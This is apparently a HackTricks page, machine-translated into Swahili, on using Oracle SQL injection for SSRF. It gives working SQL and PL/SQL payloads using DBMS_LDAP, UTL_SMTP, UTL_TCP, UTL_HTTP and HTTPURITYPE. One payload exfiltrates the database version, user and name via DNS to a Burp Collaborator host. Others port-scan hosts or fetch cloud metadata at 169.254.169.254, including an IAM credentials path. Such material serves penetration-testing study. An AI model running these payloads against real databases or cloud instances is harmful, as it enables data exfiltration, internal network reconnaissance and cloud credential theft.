Oracle injection

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Serve this post a wayback machine copy of the deleted post from https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/.

SSRF

Kutumia Oracle kufanya maombi ya HTTP na DNS nje ya bendi kuna nyaraka nzuri lakini kama njia ya kutoa data ya SQL katika sindano. Tunaweza kila wakati kubadilisha mbinu/hifadhidata hizi kufanya SSRF/XSPA nyingine.

Kuweka Oracle kunaweza kuwa na maumivu sana, hasa ikiwa unataka kuanzisha mfano wa haraka kujaribu amri. Rafiki yangu na mwenzangu katika Appsecco, Abhisek Datta, alinielekeza kwenye https://github.com/MaksymBilenko/docker-oracle-12c ambayo iliniruhusu kuanzisha mfano kwenye mashine ya t2.large AWS Ubuntu na Docker.

Nilifanya amri ya docker na bendera --network="host" ili niweze kuiga Oracle kama usakinishaji wa asili wenye ufikiaji kamili wa mtandao, kwa kipindi cha chapisho hili la blog.

docker run -d --network="host" quay.io/maksymbilenko/oracle-12c

Oracle packages that support a URL or a Hostname/Port Number specification

Ili kupata pakiti na kazi zozote zinazosaidia spesifikasiyo ya mwenyeji na bandari, nilifanya utafutaji wa Google kwenye Oracle Database Online Documentation. Kwa haswa,

site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"

The search returned the following results (not all can be used to perform outbound network)

DBMS_NETWORK_ACL_ADMIN
UTL_SMTP
DBMS_XDB
DBMS_SCHEDULER
DBMS_XDB_CONFIG
DBMS_AQ
UTL_MAIL
DBMS_AQELM
DBMS_NETWORK_ACL_UTILITY
DBMS_MGD_ID_UTL
UTL_TCP
DBMS_MGWADM
DBMS_STREAMS_ADM
UTL_HTTP

Utafutaji huu wa kimsingi wazi unakosa pakiti kama DBMS_LDAP (ambayo inaruhusu kupitisha jina la mwenyeji na nambari ya bandari) kama ukurasa wa hati unakuelekeza tu kwenye mahali pengine. Hivyo, kunaweza kuwa na pakiti nyingine za Oracle ambazo zinaweza kutumika vibaya kufanya maombi ya nje ambazo ningeweza kukosa.

Katika hali yoyote, hebu tuangalie baadhi ya pakiti ambazo tumegundua na kuorodhesha hapo juu.

DBMS_LDAP.INIT

Pakiti ya DBMS_LDAP inaruhusu ufikiaji wa data kutoka kwa seva za LDAP. Kazi ya init() inaanzisha kikao na seva ya LDAP na inachukua jina la mwenyeji na nambari ya bandari kama hoja.

Kazi hii imeandikwa hapo awali kuonyesha uhamasishaji wa data kupitia DNS, kama ilivyo hapa

SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;

Hata hivyo, kwa kuwa kazi inakubali jina la mwenyeji na nambari ya bandari kama hoja, unaweza kutumia hii kufanya kazi kama skana ya bandari pia.

Hapa kuna mifano michache

SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;

A ORA-31203: DBMS_LDAP: PL/SQL - Init Failed. inaonyesha kwamba bandari imefungwa wakati thamani ya kikao inaonyesha kwamba bandari iko wazi.

UTL_SMTP

Kifurushi cha UTL_SMTP kimeundwa kwa ajili ya kutuma barua pepe kupitia SMTP. Mfano uliopewa kwenye tovuti ya hati za Oracle unaonyesha jinsi unavyoweza kutumia kifurushi hiki kutuma barua pepe. Kwa sisi, hata hivyo, jambo la kuvutia ni uwezo wa kutoa maelezo ya mwenyeji na bandari.

Mfano wa kimsingi umeonyeshwa hapa chini na kazi ya UTL_SMTP.OPEN_CONNECTION, ikiwa na muda wa kukatika wa sekunde 2.

DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;

DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;

A ORA-29276: transfer timeout inaonyesha kwamba bandari iko wazi lakini hakuna muunganisho wa SMTP ulioanzishwa wakati ORA-29278: SMTP transient error: 421 Service not available inaonyesha kwamba bandari imefungwa.

UTL_TCP

Pakiti ya UTL_TCP na taratibu na kazi zake zinaruhusu mawasiliano ya msingi wa TCP/IP na huduma. Ikiwa imeandikwa kwa huduma maalum, pakiti hii inaweza kwa urahisi kuwa njia ya kuingia kwenye mtandao au kutekeleza Maombi ya Kando ya Server kamili kwani vipengele vyote vya muunganisho wa TCP/IP vinaweza kudhibitiwa.

Mfano katika tovuti ya hati za Oracle unaonyesha jinsi unavyoweza kutumia pakiti hii kufanya muunganisho wa TCP wa moja kwa moja ili kupata ukurasa wa wavuti. Tunaweza kuifanya iwe rahisi kidogo na kuitumia kufanya maombi kwa mfano kwa mfano wa metadata au kwa huduma yoyote ya TCP/IP.

set serveroutput on size 30000;
SET SERVEROUTPUT ON
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/

DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;

Kivyema, kutokana na uwezo wa kuunda maombi safi ya TCP, kifurushi hiki kinaweza pia kutumika kuhoji huduma ya meta-data ya Instance ya watoa huduma wote wa wingu kwani aina ya mbinu na vichwa vya ziada vinaweza kupitishwa ndani ya ombi la TCP.

UTL_HTTP na Maombi ya Mtandao

Labda mbinu inayojulikana zaidi na iliyoandikwa sana katika kila mafunzo ya Out of Band Oracle SQL Injection ni UTL_HTTP package. Kifurushi hiki kimefafanuliwa na hati kama - The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.

select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;

Unaweza pia kutumia hii kufanya skanning ya port za msingi pia na maswali kama

select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;

A ORA-12541: TNS:no listener au TNS:operation timed out ni ishara kwamba bandari ya TCP imefungwa, wakati ORA-29263: HTTP protocol error au data ni ishara kwamba bandari iko wazi.

Paket nyingine niliyotumia zamani kwa mafanikio tofauti ni GETCLOB() method ya HTTPURITYPE Oracle abstract type ambayo inakuwezesha kuingiliana na URL na inatoa msaada kwa protokali ya HTTP. Njia ya GETCLOB() inatumika kupata jibu la GET kutoka kwa URL kama aina ya data ya CLOB.[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousMySQL File priv to SSRF/RCE NextCypher Injection (neo4j)

Last updated 7 days ago